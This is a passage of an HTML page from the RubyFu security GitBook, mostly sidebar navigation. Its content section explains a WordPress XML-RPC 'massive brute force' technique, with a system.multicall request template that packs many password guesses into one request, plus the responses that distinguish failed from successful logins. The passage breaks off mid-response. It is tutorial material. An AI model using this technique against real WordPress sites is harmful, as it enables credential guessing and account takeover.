665
|
+
<i class="fa fa-check"></i>
|
666
|
+
|
667
|
+
<b>4.</b>
|
668
|
+
|
669
|
+
Module 0x4 | Web Kung Fu
|
670
|
+
</a>
|
671
|
+
|
672
|
+
|
673
|
+
<ul class="articles">
|
674
|
+
|
675
|
+
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
677
|
+
|
678
|
+
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
680
|
+
|
681
|
+
<i class="fa fa-check"></i>
|
682
|
+
|
683
|
+
<b>4.1.</b>
|
684
|
+
|
685
|
+
SQL Injection Scanner
|
686
|
+
</a>
|
687
|
+
|
688
|
+
|
689
|
+
</li>
|
690
|
+
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
692
|
+
|
693
|
+
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
695
|
+
|
696
|
+
<i class="fa fa-check"></i>
|
697
|
+
|
698
|
+
<b>4.2.</b>
|
699
|
+
|
700
|
+
Databases
|
701
|
+
</a>
|
702
|
+
|
703
|
+
|
704
|
+
</li>
|
705
|
+
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
707
|
+
|
708
|
+
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
710
|
+
|
711
|
+
<i class="fa fa-check"></i>
|
712
|
+
|
713
|
+
<b>4.3.</b>
|
714
|
+
|
715
|
+
Extending Burp Suite
|
716
|
+
</a>
|
717
|
+
|
718
|
+
|
719
|
+
</li>
|
720
|
+
|
721
|
+
<li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
722
|
+
|
723
|
+
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
725
|
+
|
726
|
+
<i class="fa fa-check"></i>
|
727
|
+
|
728
|
+
<b>4.4.</b>
|
729
|
+
|
730
|
+
Browser Manipulation
|
731
|
+
</a>
|
732
|
+
|
733
|
+
|
734
|
+
</li>
|
735
|
+
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
737
|
+
|
738
|
+
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
740
|
+
|
741
|
+
<i class="fa fa-check"></i>
|
742
|
+
|
743
|
+
<b>4.5.</b>
|
744
|
+
|
745
|
+
Web Services and APIs
|
746
|
+
</a>
|
747
|
+
|
748
|
+
|
749
|
+
<ul class="articles">
|
750
|
+
|
751
|
+
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
753
|
+
|
754
|
+
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
756
|
+
|
757
|
+
<i class="fa fa-check"></i>
|
758
|
+
|
759
|
+
<b>4.5.1.</b>
|
760
|
+
|
761
|
+
Interacting with Web Services
|
762
|
+
</a>
|
763
|
+
|
764
|
+
|
765
|
+
</li>
|
766
|
+
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
768
|
+
|
769
|
+
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
771
|
+
|
772
|
+
<i class="fa fa-check"></i>
|
773
|
+
|
774
|
+
<b>4.5.2.</b>
|
775
|
+
|
776
|
+
Interacting with APIs
|
777
|
+
</a>
|
778
|
+
|
779
|
+
|
780
|
+
<ul class="articles">
|
781
|
+
|
782
|
+
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
784
|
+
|
785
|
+
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
787
|
+
|
788
|
+
<i class="fa fa-check"></i>
|
789
|
+
|
790
|
+
<b>4.5.2.1.</b>
|
791
|
+
|
792
|
+
WordPress API
|
793
|
+
</a>
|
794
|
+
|
795
|
+
|
796
|
+
</li>
|
797
|
+
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
799
|
+
|
800
|
+
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
802
|
+
|
803
|
+
<i class="fa fa-check"></i>
|
804
|
+
|
805
|
+
<b>4.5.2.2.</b>
|
806
|
+
|
807
|
+
Twitter API
|
808
|
+
</a>
|
809
|
+
|
810
|
+
|
811
|
+
</li>
|
812
|
+
|
813
|
+
|
814
|
+
</ul>
|
815
|
+
|
816
|
+
</li>
|
817
|
+
|
818
|
+
|
819
|
+
</ul>
|
820
|
+
|
821
|
+
</li>
|
822
|
+
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
824
|
+
|
825
|
+
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
827
|
+
|
828
|
+
<i class="fa fa-check"></i>
|
829
|
+
|
830
|
+
<b>4.6.</b>
|
831
|
+
|
832
|
+
Ruby 2 JavaScript
|
833
|
+
</a>
|
834
|
+
|
835
|
+
|
836
|
+
</li>
|
837
|
+
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
839
|
+
|
840
|
+
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
842
|
+
|
843
|
+
<i class="fa fa-check"></i>
|
844
|
+
|
845
|
+
<b>4.7.</b>
|
846
|
+
|
847
|
+
Web Server and Proxy
|
848
|
+
</a>
|
849
|
+
|
850
|
+
|
851
|
+
</li>
|
852
|
+
|
853
|
+
|
854
|
+
</ul>
|
855
|
+
|
856
|
+
</li>
|
857
|
+
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
859
|
+
|
860
|
+
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
862
|
+
|
863
|
+
<i class="fa fa-check"></i>
|
864
|
+
|
865
|
+
<b>5.</b>
|
866
|
+
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
868
|
+
</a>
|
869
|
+
|
870
|
+
|
871
|
+
<ul class="articles">
|
872
|
+
|
873
|
+
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
875
|
+
|
876
|
+
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
878
|
+
|
879
|
+
<i class="fa fa-check"></i>
|
880
|
+
|
881
|
+
<b>5.1.</b>
|
882
|
+
|
883
|
+
Fuzzer
|
884
|
+
</a>
|
885
|
+
|
886
|
+
|
887
|
+
</li>
|
888
|
+
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
890
|
+
|
891
|
+
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
893
|
+
|
894
|
+
<i class="fa fa-check"></i>
|
895
|
+
|
896
|
+
<b>5.2.</b>
|
897
|
+
|
898
|
+
Metasploit
|
899
|
+
</a>
|
900
|
+
|
901
|
+
|
902
|
+
<ul class="articles">
|
903
|
+
|
904
|
+
|
905
|
+
<li class="chapter active" data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
906
|
+
|
907
|
+
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
909
|
+
|
910
|
+
<i class="fa fa-check"></i>
|
911
|
+
|
912
|
+
<b>5.2.1.</b>
|
913
|
+
|
914
|
+
Auxiliary module
|
915
|
+
</a>
|
916
|
+
|
917
|
+
|
918
|
+
</li>
|
919
|
+
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
921
|
+
|
922
|
+
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
924
|
+
|
925
|
+
<i class="fa fa-check"></i>
|
926
|
+
|
927
|
+
<b>5.2.2.</b>
|
928
|
+
|
929
|
+
Exploit module
|
930
|
+
</a>
|
931
|
+
|
932
|
+
|
933
|
+
</li>
|
934
|
+
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
936
|
+
|
937
|
+
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
939
|
+
|
940
|
+
<i class="fa fa-check"></i>
|
941
|
+
|
942
|
+
<b>5.2.3.</b>
|
943
|
+
|
944
|
+
Meterpreter
|
945
|
+
</a>
|
946
|
+
|
947
|
+
|
948
|
+
<ul class="articles">
|
949
|
+
|
950
|
+
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
952
|
+
|
953
|
+
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
955
|
+
|
956
|
+
<i class="fa fa-check"></i>
|
957
|
+
|
958
|
+
<b>5.2.3.1.</b>
|
959
|
+
|
960
|
+
API and Extensions
|
961
|
+
</a>
|
962
|
+
|
963
|
+
|
964
|
+
</li>
|
965
|
+
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
967
|
+
|
968
|
+
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
970
|
+
|
971
|
+
<i class="fa fa-check"></i>
|
972
|
+
|
973
|
+
<b>5.2.3.2.</b>
|
974
|
+
|
975
|
+
Meterpreter Scripting
|
976
|
+
</a>
|
977
|
+
|
978
|
+
|
979
|
+
</li>
|
980
|
+
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
982
|
+
|
983
|
+
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
985
|
+
|
986
|
+
<i class="fa fa-check"></i>
|
987
|
+
|
988
|
+
<b>5.2.3.3.</b>
|
989
|
+
|
990
|
+
Railgun API Extension
|
991
|
+
</a>
|
992
|
+
|
993
|
+
|
994
|
+
</li>
|
995
|
+
|
996
|
+
|
997
|
+
</ul>
|
998
|
+
|
999
|
+
</li>
|
1000
|
+
|
1001
|
+
|
1002
|
+
</ul>
|
1003
|
+
|
1004
|
+
</li>
|
1005
|
+
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
1007
|
+
|
1008
|
+
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
1010
|
+
|
1011
|
+
<i class="fa fa-check"></i>
|
1012
|
+
|
1013
|
+
<b>5.3.</b>
|
1014
|
+
|
1015
|
+
metasm
|
1016
|
+
</a>
|
1017
|
+
|
1018
|
+
|
1019
|
+
</li>
|
1020
|
+
|
1021
|
+
|
1022
|
+
</ul>
|
1023
|
+
|
1024
|
+
</li>
|
1025
|
+
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
1027
|
+
|
1028
|
+
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
1030
|
+
|
1031
|
+
<i class="fa fa-check"></i>
|
1032
|
+
|
1033
|
+
<b>6.</b>
|
1034
|
+
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
1036
|
+
</a>
|
1037
|
+
|
1038
|
+
|
1039
|
+
<ul class="articles">
|
1040
|
+
|
1041
|
+
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
1043
|
+
|
1044
|
+
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
1046
|
+
|
1047
|
+
<i class="fa fa-check"></i>
|
1048
|
+
|
1049
|
+
<b>6.1.</b>
|
1050
|
+
|
1051
|
+
Windows Forensic
|
1052
|
+
</a>
|
1053
|
+
|
1054
|
+
|
1055
|
+
</li>
|
1056
|
+
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
1058
|
+
|
1059
|
+
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
1061
|
+
|
1062
|
+
<i class="fa fa-check"></i>
|
1063
|
+
|
1064
|
+
<b>6.2.</b>
|
1065
|
+
|
1066
|
+
Android Forensic
|
1067
|
+
</a>
|
1068
|
+
|
1069
|
+
|
1070
|
+
</li>
|
1071
|
+
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1073
|
+
|
1074
|
+
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1076
|
+
|
1077
|
+
<i class="fa fa-check"></i>
|
1078
|
+
|
1079
|
+
<b>6.3.</b>
|
1080
|
+
|
1081
|
+
Network Traffic Analysis
|
1082
|
+
</a>
|
1083
|
+
|
1084
|
+
|
1085
|
+
</li>
|
1086
|
+
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
1088
|
+
|
1089
|
+
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
1091
|
+
|
1092
|
+
<i class="fa fa-check"></i>
|
1093
|
+
|
1094
|
+
<b>6.4.</b>
|
1095
|
+
|
1096
|
+
Parsing Log Files
|
1097
|
+
</a>
|
1098
|
+
|
1099
|
+
|
1100
|
+
</li>
|
1101
|
+
|
1102
|
+
|
1103
|
+
</ul>
|
1104
|
+
|
1105
|
+
</li>
|
1106
|
+
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
1108
|
+
|
1109
|
+
|
1110
|
+
<a href="../references/index.html">
|
1111
|
+
|
1112
|
+
<i class="fa fa-check"></i>
|
1113
|
+
|
1114
|
+
<b>7.</b>
|
1115
|
+
|
1116
|
+
References
|
1117
|
+
</a>
|
1118
|
+
|
1119
|
+
|
1120
|
+
</li>
|
1121
|
+
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
1123
|
+
|
1124
|
+
|
1125
|
+
<a href="../faqs/index.html">
|
1126
|
+
|
1127
|
+
<i class="fa fa-check"></i>
|
1128
|
+
|
1129
|
+
<b>8.</b>
|
1130
|
+
|
1131
|
+
FAQs
|
1132
|
+
</a>
|
1133
|
+
|
1134
|
+
|
1135
|
+
</li>
|
1136
|
+
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
1138
|
+
|
1139
|
+
|
1140
|
+
<a href="../contributors/index.html">
|
1141
|
+
|
1142
|
+
<i class="fa fa-check"></i>
|
1143
|
+
|
1144
|
+
<b>9.</b>
|
1145
|
+
|
1146
|
+
Contributors
|
1147
|
+
</a>
|
1148
|
+
|
1149
|
+
|
1150
|
+
<ul class="articles">
|
1151
|
+
|
1152
|
+
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
1154
|
+
|
1155
|
+
|
1156
|
+
<a href="../contributors/todo.html">
|
1157
|
+
|
1158
|
+
<i class="fa fa-check"></i>
|
1159
|
+
|
1160
|
+
<b>9.1.</b>
|
1161
|
+
|
1162
|
+
TODO
|
1163
|
+
</a>
|
1164
|
+
|
1165
|
+
|
1166
|
+
</li>
|
1167
|
+
|
1168
|
+
|
1169
|
+
</ul>
|
1170
|
+
|
1171
|
+
</li>
|
1172
|
+
|
1173
|
+
|
1174
|
+
|
1175
|
+
|
1176
|
+
<li class="divider"></li>
|
1177
|
+
<li>
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
1179
|
+
Published with GitBook
|
1180
|
+
</a>
|
1181
|
+
</li>
|
1182
|
+
|
1183
|
+
</ul>
|
1184
|
+
</nav>
|
1185
|
+
</div>
|
1186
|
+
|
1187
|
+
<div class="book-body">
|
1188
|
+
<div class="body-inner">
|
1189
|
+
<div class="book-header" role="navigation">
|
1190
|
+
<!-- Actions Left -->
|
1191
|
+
|
1192
|
+
|
1193
|
+
<!-- Title -->
|
1194
|
+
<h1>
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
1196
|
+
<a href="../" >RubyFu</a>
|
1197
|
+
</h1>
|
1198
|
+
</div>
|
1199
|
+
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
1201
|
+
<div class="page-inner">
|
1202
|
+
|
1203
|
+
|
1204
|
+
<section class="normal" id="section-">
|
1205
|
+
|
1206
|
+
<h1 id="auxiliary-module"><a name="auxiliary-module" class="plugin-anchor" href="#auxiliary-module"><span class="fa fa-link"></span></a>Auxiliary module</h1>
|
1207
|
+
<h2 id="scanner"><a name="scanner" class="plugin-anchor" href="#scanner"><span class="fa fa-link"></span></a>Scanner</h2>
|
1208
|
+
<p>Basic Scanner modules</p>
|
1209
|
+
<h3 id="wordpress-xmlrpc-massive-brute-force"><a name="wordpress-xmlrpc-massive-brute-force" class="plugin-anchor" href="#wordpress-xmlrpc-massive-brute-force"><span class="fa fa-link"></span></a>WordPress XML-RPC Massive Brute Force</h3>
|
1210
|
+
<p>WordPress CMS framework support XML-RPC service to interact with almost all functions in the framework. Some functions require authentication. The main issues lies in the you can authenticate many times within the same request. WordPress accepts about 1788 lines of XML request which allows us to send tremendous number of login tries in a single request. So how awesome is this? Let me explain. </p>
|
1211
|
+
<p>Imagine that you have to brute force one user with 6000 passwords? How many requests you have to send in the normal brute force technique? It's 6000 requests. Using our module will need to 4 requests only of you use the default CHUNKSIZE which is 1500 password per request!!!. NO MULTI-THREADING even you use multi-threading in the traditional brute force technique you'll send 6000 request a few of its are parallel.</p>
|
1212
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0"?></span>
|
1213
|
+
<span class="hljs-tag"><<span class="hljs-title">methodCall</span>></span>
|
1214
|
+
<span class="hljs-tag"><<span class="hljs-title">methodName</span>></span>system.multicall<span class="hljs-tag"></<span class="hljs-title">methodName</span>></span>
|
1215
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1216
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1217
|
+
|
1218
|
+
|
1219
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1220
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1221
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>methodName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1222
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>wp.getUsersBlogs<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1223
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1224
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1225
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>params<span class="hljs-tag"></<span class="hljs-title">name</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1226
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1227
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"USER #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1228
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"PASS #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1229
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1230
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1231
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1232
|
+
|
1233
|
+
...Snippet...
|
1234
|
+
|
1235
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1236
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1237
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>methodName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1238
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>wp.getUsersBlogs<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1239
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1240
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1241
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>params<span class="hljs-tag"></<span class="hljs-title">name</span>></span><span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1242
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">array</span>></span><span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1243
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"USER #1"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1244
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span><span class="hljs-tag"><<span class="hljs-title">string</span>></span>"PASS #N"<span class="hljs-tag"></<span class="hljs-title">string</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1245
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1246
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span><span class="hljs-tag"></<span class="hljs-title">array</span>></span><span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1247
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1248
|
+
|
1249
|
+
|
1250
|
+
<span class="hljs-tag"></<span class="hljs-title">params</span>></span>
|
1251
|
+
<span class="hljs-tag"></<span class="hljs-title">methodCall</span>></span>
|
1252
|
+
</code></pre>
|
1253
|
+
<p>So from above you can understand how the XML request will be build. Now How the reply will be?
|
1254
|
+
To simplify this we'll test a single user once with wrong password another with correct password to understand the response behavior </p>
|
1255
|
+
<p><strong>wrong password response</strong></p>
|
1256
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0" encoding="UTF-8"?></span>
|
1257
|
+
<span class="hljs-tag"><<span class="hljs-title">methodResponse</span>></span>
|
1258
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1259
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span>
|
1260
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1261
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1262
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1263
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1264
|
+
<span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1265
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1266
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>faultCode<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1267
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1268
|
+
<span class="hljs-tag"><<span class="hljs-title">int</span>></span>403<span class="hljs-tag"></<span class="hljs-title">int</span>></span>
|
1269
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1270
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1271
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1272
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>faultString<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1273
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1274
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>Incorrect username or password.<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1275
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1276
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1277
|
+
<span class="hljs-tag"></<span class="hljs-title">struct</span>></span>
|
1278
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1279
|
+
<span class="hljs-tag"></<span class="hljs-title">data</span>></span>
|
1280
|
+
<span class="hljs-tag"></<span class="hljs-title">array</span>></span>
|
1281
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1282
|
+
<span class="hljs-tag"></<span class="hljs-title">param</span>></span>
|
1283
|
+
<span class="hljs-tag"></<span class="hljs-title">params</span>></span>
|
1284
|
+
<span class="hljs-tag"></<span class="hljs-title">methodResponse</span>></span>
|
1285
|
+
</code></pre>
|
1286
|
+
<p>We noticed the following </p>
|
1287
|
+
<ul>
|
1288
|
+
<li><code><name>faultCode</name></code></li>
|
1289
|
+
<li><code><int>403</int></code></li>
|
1290
|
+
<li><code><string>Incorrect username or password.</string></code></li>
|
1291
|
+
</ul>
|
1292
|
+
<p>Usually we rely one the string response '<em>Incorrect username or password.</em>', but what if the WordPress language wasn't English? so the best thing is the integer response which is <code>403</code></p>
|
1293
|
+
<p><strong>correct password response</strong></p>
|
1294
|
+
<pre><code class="lang-xml"><span class="hljs-pi"><?xml version="1.0" encoding="UTF-8"?></span>
|
1295
|
+
<span class="hljs-tag"><<span class="hljs-title">methodResponse</span>></span>
|
1296
|
+
<span class="hljs-tag"><<span class="hljs-title">params</span>></span>
|
1297
|
+
<span class="hljs-tag"><<span class="hljs-title">param</span>></span>
|
1298
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1299
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1300
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1301
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1302
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1303
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1304
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1305
|
+
<span class="hljs-tag"><<span class="hljs-title">array</span>></span>
|
1306
|
+
<span class="hljs-tag"><<span class="hljs-title">data</span>></span>
|
1307
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1308
|
+
<span class="hljs-tag"><<span class="hljs-title">struct</span>></span>
|
1309
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1310
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>isAdmin<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1311
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1312
|
+
<span class="hljs-tag"><<span class="hljs-title">boolean</span>></span>1<span class="hljs-tag"></<span class="hljs-title">boolean</span>></span>
|
1313
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1314
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1315
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1316
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>url<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1317
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1318
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>http://172.17.0.3/<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1319
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1320
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1321
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1322
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>blogid<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1323
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1324
|
+
<span class="hljs-tag"><<span class="hljs-title">string</span>></span>1<span class="hljs-tag"></<span class="hljs-title">string</span>></span>
|
1325
|
+
<span class="hljs-tag"></<span class="hljs-title">value</span>></span>
|
1326
|
+
<span class="hljs-tag"></<span class="hljs-title">member</span>></span>
|
1327
|
+
<span class="hljs-tag"><<span class="hljs-title">member</span>></span>
|
1328
|
+
<span class="hljs-tag"><<span class="hljs-title">name</span>></span>blogName<span class="hljs-tag"></<span class="hljs-title">name</span>></span>
|
1329
|
+
<span class="hljs-tag"><<span class="hljs-title">value</span>></span>
|
1330
|
+
